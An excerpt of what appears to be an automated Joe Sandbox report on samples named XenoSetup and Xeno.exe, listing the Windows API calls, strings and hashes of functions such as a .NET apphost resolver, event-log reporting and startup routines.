Part of subcall function 00FE6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FE6C54

Strings

CreateThread failed, xrefs: 00FF104F

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: f98229aa847065fa9f1fc1100770c604202d36fa735443cd8fdca7e97ee00a90
Instruction ID: d1a39ad8b1dce3ef55b2a1d9bb3ab7e3ea3d79a112d7d0bd6c8aac30cdbcfa82
Opcode Fuzzy Hash: f98229aa847065fa9f1fc1100770c604202d36fa735443cd8fdca7e97ee00a90
Instruction Fuzzy Hash: 0F01D6B534434DABD3345E65EC91F76B398FF50761F20002EFAC696285CEEAA8449724

Function 00FE1316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00FEE2E8: _swprintf.LIBCMT ref: 00FEE30E
Part of subcall function 00FEE2E8: _strlen.LIBCMT ref: 00FEE32F
Part of subcall function 00FEE2E8: SetDlgItemTextW.USER32(?,0101E274,?), ref: 00FEE38F
Part of subcall function 00FEE2E8: GetWindowRect.USER32(?,?), ref: 00FEE3C9
Part of subcall function 00FEE2E8: GetClientRect.USER32(?,?), ref: 00FEE3D5

GetDlgItem.USER32(00000000,00003021), ref: 00FE135A
SetWindowTextW.USER32(00000000,010135F4), ref: 00FE1370

Strings

0, xrefs: 00FE1319

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: 713e95c96ee9b5688137299791da814fc067d391382a915753d9cb2d1b4446af
Instruction ID: 081be2bc5c6c9ec6d29863027768b90034d84d6345dd670a5cc0a07f0fb7ee6a
Opcode Fuzzy Hash: 713e95c96ee9b5688137299791da814fc067d391382a915753d9cb2d1b4446af
Instruction Fuzzy Hash: 9EF08CB09042D8ABDF150F63C80DBAA3B68BB40364F048208FD84589E1CB7AC890BB10

Function 00FF0FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00FF1206,?), ref: 00FF0FEA
GetLastError.KERNEL32(?), ref: 00FF0FF6

Part of subcall function 00FE6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FE6C54

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00FF0FFF

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: 3acdcf3ddeefa09c46b4512157dc283edcc1f8d2d3484833f16d6e94a34ce15c
Instruction ID: 8202bd2181984d9efb09584688ffe2d92555cf89e394a37d048e779a8e1dda4e
Opcode Fuzzy Hash: 3acdcf3ddeefa09c46b4512157dc283edcc1f8d2d3484833f16d6e94a34ce15c
Instruction Fuzzy Hash: 64D02B3154413476C62132299C09D7E3C04AF21772B300714F1B8A81EACF2D08416391

Function 00FEE29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00FEDA55,?), ref: 00FEE2A3
FindResourceW.KERNEL32(00000000,RTL,00000005,?,00FEDA55,?), ref: 00FEE2B1

Strings

RTL, xrefs: 00FEE2AB

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: 311b5697f1645b25f4ddb967b3d8fb850904866d0ef19bce736c561b9745c5fb
Instruction ID: 68d5fb179a17af06b46e0d669d7574bd77aac68e5ecba345c8fb31b63e33dabe
Opcode Fuzzy Hash: 311b5697f1645b25f4ddb967b3d8fb850904866d0ef19bce736c561b9745c5fb
Instruction Fuzzy Hash: AEC01231E4075066E6311A657C1DB436E986B00B31F05048CB281FD1C5D6AEC44087A0

Analysis Process: Xeno.exePID: 6532, Parent PID: 876COMMON

Execution Graph

Execution Coverage:	5.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.6%
Total number of Nodes:	1410
Total number of Limit Nodes:	8

Executed Functions

Function 00007FF68D5EF010 Relevance: 63.7, APIs: 12, Strings: 24, Instructions: 658COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF68D5EB670: GetModuleFileNameW.KERNEL32 ref: 00007FF68D5EB747
Part of subcall function 00007FF68D5EB670: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EB870

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EFB04

Part of subcall function 00007FF68D5ECD20: GetFileAttributesExW.KERNEL32 ref: 00007FF68D5ECD99

Part of subcall function 00007FF68D5EECD0: MultiByteToWideChar.KERNEL32 ref: 00007FF68D5EED48
Part of subcall function 00007FF68D5EECD0: MultiByteToWideChar.KERNEL32 ref: 00007FF68D5EED8B

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EF230
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EF9DE
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EFA32
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EFA89

Strings

The required library %s does not support single-file apps., xrefs: 00007FF68D5EF4D3
Detected Single-File app bundle, xrefs: 00007FF68D5EF2A8
hostfxr_main_startupinfo, xrefs: 00007FF68D5EF66A, 00007FF68D5EF683
- Installing .NET prerequisites might help resolve this problem., xrefs: 00007FF68D5EF45A
The application to execute does not exist: '%s'., xrefs: 00007FF68D5EF39E
%s, xrefs: 00007FF68D5EF46D
The required library %s does not support relative app dll paths., xrefs: 00007FF68D5EF6AA
The required library %s does not contain the expected entry point., xrefs: 00007FF68D5EF712
Invoking fx resolver [%s] v1, xrefs: 00007FF68D5EF6CA
hostfxr_set_error_writer, xrefs: 00007FF68D5EF5C0, 00007FF68D5EF5D9, 00007FF68D5EF7EF, 00007FF68D5EF808
hostfxr_main_bundle_startupinfo, xrefs: 00007FF68D5EF49D, 00007FF68D5EF4B2
Bundle Header Offset: [%lld], xrefs: 00007FF68D5EF5B4
\, xrefs: 00007FF68D5EF150
The library %s was found, but loading it from %s failed, xrefs: 00007FF68D5EF44E
Probed for and did not resolve library symbol %S, xrefs: 00007FF68D5EF4B9, 00007FF68D5EF5E0, 00007FF68D5EF68A, 00007FF68D5EF6F8, 00007FF68D5EF80F
hostfxr.dll, xrefs: 00007FF68D5EF447
App path: [%s], xrefs: 00007FF68D5EF5A5, 00007FF68D5EF7E3
Failed to resolve full path of the current executable [%s], xrefs: 00007FF68D5EFABB
Invoking fx resolver [%s] hostfxr_main_startupinfo, xrefs: 00007FF68D5EF790
hostfxr_main, xrefs: 00007FF68D5EF6DB, 00007FF68D5EF6F1
Dotnet path: [%s], xrefs: 00007FF68D5EF588, 00007FF68D5EF7C6
Invoking fx resolver [%s] hostfxr_main_bundle_startupinfo, xrefs: 00007FF68D5EF552
Host path: [%s], xrefs: 00007FF68D5EF56E, 00007FF68D5EF7AC
https://go.microsoft.com/fwlink/?linkid=798306, xrefs: 00007FF68D5EF466

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ByteCharFileMultiWide$AttributesModuleName
String ID: %s$ - Installing .NET prerequisites might help resolve this problem.$App path: [%s]$Bundle Header Offset: [%lld]$Detected Single-File app bundle$Dotnet path: [%s]$Failed to resolve full path of the current executable [%s]$Host path: [%s]$Invoking fx resolver [%s] hostfxr_main_bundle_startupinfo$Invoking fx resolver [%s] hostfxr_main_startupinfo$Invoking fx resolver [%s] v1$Probed for and did not resolve library symbol %S$The application to execute does not exist: '%s'.$The library %s was found, but loading it from %s failed$The required library %s does not contain the expected entry point.$The required library %s does not support relative app dll paths.$The required library %s does not support single-file apps.$\$hostfxr.dll$hostfxr_main$hostfxr_main_bundle_startupinfo$hostfxr_main_startupinfo$hostfxr_set_error_writer$https://go.microsoft.com/fwlink/?linkid=798306
API String ID: 2393550857-4017300566
Opcode ID: 6a3e793679028705fd871e5bda2fcd184c772be0566a5ba38b22a21630c1b779
Instruction ID: 087399e583d659b442bec98d8ff4639e1f4c22c4c4e9a828c98c25ad40700a53
Opcode Fuzzy Hash: 6a3e793679028705fd871e5bda2fcd184c772be0566a5ba38b22a21630c1b779
Instruction Fuzzy Hash: 79628462E18B82D5FB009B64E4403AD23A1FF44798F50523BDE5D87A99EFBCE589C311

Function 00007FF68D5E44E0 Relevance: 7.8, APIs: 5, Instructions: 337
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF68D5EB670: GetModuleFileNameW.KERNEL32 ref: 00007FF68D5EB747
Part of subcall function 00007FF68D5EB670: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EB870

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5E4739
GetModuleHandleW.KERNEL32 ref: 00007FF68D5E4774
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5E47D3
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5E4828
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68D5E486E

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Module$Concurrency::cancel_current_taskFileHandleName
String ID:
API String ID: 1091411171-0
Opcode ID: 941ecb483df5ffccfcd00972da0a06e3cde05fdc4887f70ae5dc1777fb017ae0
Instruction ID: 5cd1117ccbd952e9685b39550cb6bb5ad64f034d08706818057a5f87433fab2c
Opcode Fuzzy Hash: 941ecb483df5ffccfcd00972da0a06e3cde05fdc4887f70ae5dc1777fb017ae0
Instruction Fuzzy Hash: DEE1AA62F18B82C5EB00DB68D0542BC23A1FF447A8F41463ADE6D97AD5EF38E589C311

Function 00007FF68D5E77D0 Relevance: 19.7, APIs: 13, Instructions: 180
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__stdio_common_vswprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E7821
__stdio_common_vsnwprintf_s.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E78F1
OutputDebugStringW.KERNEL32 ref: 00007FF68D5E78FA
SwitchToThread.KERNEL32 ref: 00007FF68D5E792B
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E795D
fputws.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E796E
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E7979
fputwc.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E7987
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E79AB
__stdio_common_vfwprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E79DE
fputwc.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E79EC
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5E7A2E
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68D5E7A4E

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: __acrt_iob_func$fputwc$Concurrency::cancel_current_taskDebugOutputStringSwitchThread__stdio_common_vfwprintf__stdio_common_vsnwprintf_s__stdio_common_vswprintf_invalid_parameter_noinfo_noreturnfputws
String ID:
API String ID: 2955450764-0
Opcode ID: 17e2c6f9a8c859e8e4abeb7482b12a8424880920e89ab4c27e5f1dc77cac5349
Instruction ID: d18cdbdeda918256bb98736f6275ffaa58e2cc377bc89c21a363a27fa46e5849
Opcode Fuzzy Hash: 17e2c6f9a8c859e8e4abeb7482b12a8424880920e89ab4c27e5f1dc77cac5349
Instruction Fuzzy Hash: C4616F22A08B46D2EA109B56A80477973A5FF49FE0F14423ADEAD877D4EF7CE449C311

Function 00007FF68D5EFB40 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 114
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF68D5E6FE0: GetEnvironmentVariableW.KERNEL32 ref: 00007FF68D5E7039
Part of subcall function 00007FF68D5E6FE0: GetLastError.KERNEL32 ref: 00007FF68D5E7045
Part of subcall function 00007FF68D5E6FE0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5E7257

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EFC01
SwitchToThread.KERNEL32 ref: 00007FF68D5EFCAE
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5EFCC9
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5EFCDC
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5EFCE5
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5EFCF0
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5EFCF9

Part of subcall function 00007FF68D5E7720: SwitchToThread.KERNEL32 ref: 00007FF68D5E776C
Part of subcall function 00007FF68D5E7720: __stdio_common_vfwprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E77A4
Part of subcall function 00007FF68D5E7720: fputwc.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E77B2

Strings

8.0.8 @Commit: 08338fcaa5c9b9a8190abb99222fed12aaba956c, xrefs: 00007FF68D5EFB7F
--- Invoked %s [version: %s] main = {, xrefs: 00007FF68D5EFBBC
Redirecting errors to custom writer., xrefs: 00007FF68D5EFC54
apphost, xrefs: 00007FF68D5EFBAF

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: fflush$SwitchThread__acrt_iob_func_invalid_parameter_noinfo_noreturn$EnvironmentErrorLastVariable__stdio_common_vfwprintffputwc
String ID: --- Invoked %s [version: %s] main = {$8.0.8 @Commit: 08338fcaa5c9b9a8190abb99222fed12aaba956c$Redirecting errors to custom writer.$apphost
API String ID: 1906621915-1327384728
Opcode ID: 611ecf2379d5d648aa8f3ef7cce2668ccd5e97ef67745fbdd9be6b367f1a3ddc
Instruction ID: e0b4748283b2e3e328ae0365ef25b3ec91d60c01192960a8345a27598918b6d9
Opcode Fuzzy Hash: 611ecf2379d5d648aa8f3ef7cce2668ccd5e97ef67745fbdd9be6b367f1a3ddc
Instruction Fuzzy Hash: 6451DF21E08A43C1FA10AB24E8502B92361FF887D4F50413FED5DDA6A5EE7CE58DC722

Function 00007FF68D5E2440 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 242
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegisterEventSourceW.ADVAPI32 ref: 00007FF68D5E2477

Part of subcall function 00007FF68D5E62B0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68D5E102D), ref: 00007FF68D5E640F
Part of subcall function 00007FF68D5E62B0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68D5E645D

ReportEventW.ADVAPI32 ref: 00007FF68D5E27A1
DeregisterEventSource.ADVAPI32 ref: 00007FF68D5E27AA
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5E27E8

Strings

Description: A .NET application failed., xrefs: 00007FF68D5E24A4
Message: , xrefs: 00007FF68D5E266B, 00007FF68D5E268C
Application: , xrefs: 00007FF68D5E24EC, 00007FF68D5E250D
(, xrefs: 00007FF68D5E249B
Path: , xrefs: 00007FF68D5E25B1, 00007FF68D5E25D2
.NET Runtime, xrefs: 00007FF68D5E246E

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: Event$Source_invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskDeregisterRegisterReport
String ID: ($.NET Runtime$Application: $Description: A .NET application failed.$Message: $Path:
API String ID: 1590356926-970997692
Opcode ID: a0e85a36dfb1ee2e78e2b6364583cebff17205b721a9b090096a532bd07185ec
Instruction ID: 1873484965590bd97ddbdf7cbca1ebdd91f67998865a4275590abab198654ef1
Opcode Fuzzy Hash: a0e85a36dfb1ee2e78e2b6364583cebff17205b721a9b090096a532bd07185ec
Instruction Fuzzy Hash: 84B16866B14B41D5EB14DB61E4102AD2761FF48B98F84053BCE4E9BBA8EF7CE148C361

Function 00007FF68D5F10BC Relevance: 12.1, APIs: 8, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF68D5F0D80: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF68D5F0D94

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF68D5F10E5
__scrt_release_startup_lock.LIBCMT ref: 00007FF68D5F1153
_register_thread_local_exe_atexit_callback.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5F11A1
_get_initial_wide_environment.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5F11A6
__p___wargv.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5F11AE
__p___argc.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5F11B6
_cexit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5F11D8
_exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5F1232

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: __p___argc__p___wargv__scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock_cexit_exit_get_initial_wide_environment_register_thread_local_exe_atexit_callback
String ID:
API String ID: 2955606470-0
Opcode ID: 31dcba92d53d7d5c9a7d258846d929b8af869ad0fecb2b87c37cc57a296dab70
Instruction ID: ce7b6768fc822cfca8d989a6604c53354acc21546ad5c40bf1c1c6dad8062d2e
Opcode Fuzzy Hash: 31dcba92d53d7d5c9a7d258846d929b8af869ad0fecb2b87c37cc57a296dab70
Instruction Fuzzy Hash: 19312721E08646C2FA50AB25D555BB91291BF45784F44403EEE4EDF697FEBCA84CC232

Function 00007FF68D5F0FD0 Relevance: 4.6, APIs: 3, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF68D5F0DBC: _initialize_onexit_table.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5F0DF6

_RTC_Initialize.LIBCMT ref: 00007FF68D5F1008
_configthreadlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF68D5F1054
_initialize_wide_environment.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5F1062

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: Initialize_configthreadlocale_initialize_onexit_table_initialize_wide_environment
String ID:
API String ID: 2955177221-0
Opcode ID: 1b51e065acfffadd2350276333c27bd42dcabc02b54e18d4f546fda920460237
Instruction ID: 3c62d0c5c4d6dfc060a8c9dac7c013c9383aa8c36633a11dfa8c05c4d66ea893
Opcode Fuzzy Hash: 1b51e065acfffadd2350276333c27bd42dcabc02b54e18d4f546fda920460237
Instruction Fuzzy Hash: 4E115411E08242C2FA2477B29556AB91196AF51341F84083EED4DDA2C3FEADB84DC2B3

Non-executed Functions

Function 00007FF68D5EE650 Relevance: 45.9, APIs: 8, Strings: 18, Instructions: 394
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EE725

Part of subcall function 00007FF68D5E7C60: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5E7CFA
Part of subcall function 00007FF68D5E7C60: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5E7DAA

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EE8F5
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EEABF

Part of subcall function 00007FF68D5EBB10: GetEnvironmentVariableW.KERNEL32 ref: 00007FF68D5EBB71
Part of subcall function 00007FF68D5EBB10: GetLastError.KERNEL32 ref: 00007FF68D5EBB7D
Part of subcall function 00007FF68D5EBB10: GetCurrentProcess.KERNEL32 ref: 00007FF68D5EBBB1
Part of subcall function 00007FF68D5EBB10: IsWow64Process.KERNEL32 ref: 00007FF68D5EBBBF
Part of subcall function 00007FF68D5EBB10: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EBD47

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EEB03
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EEB50
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EEBC0
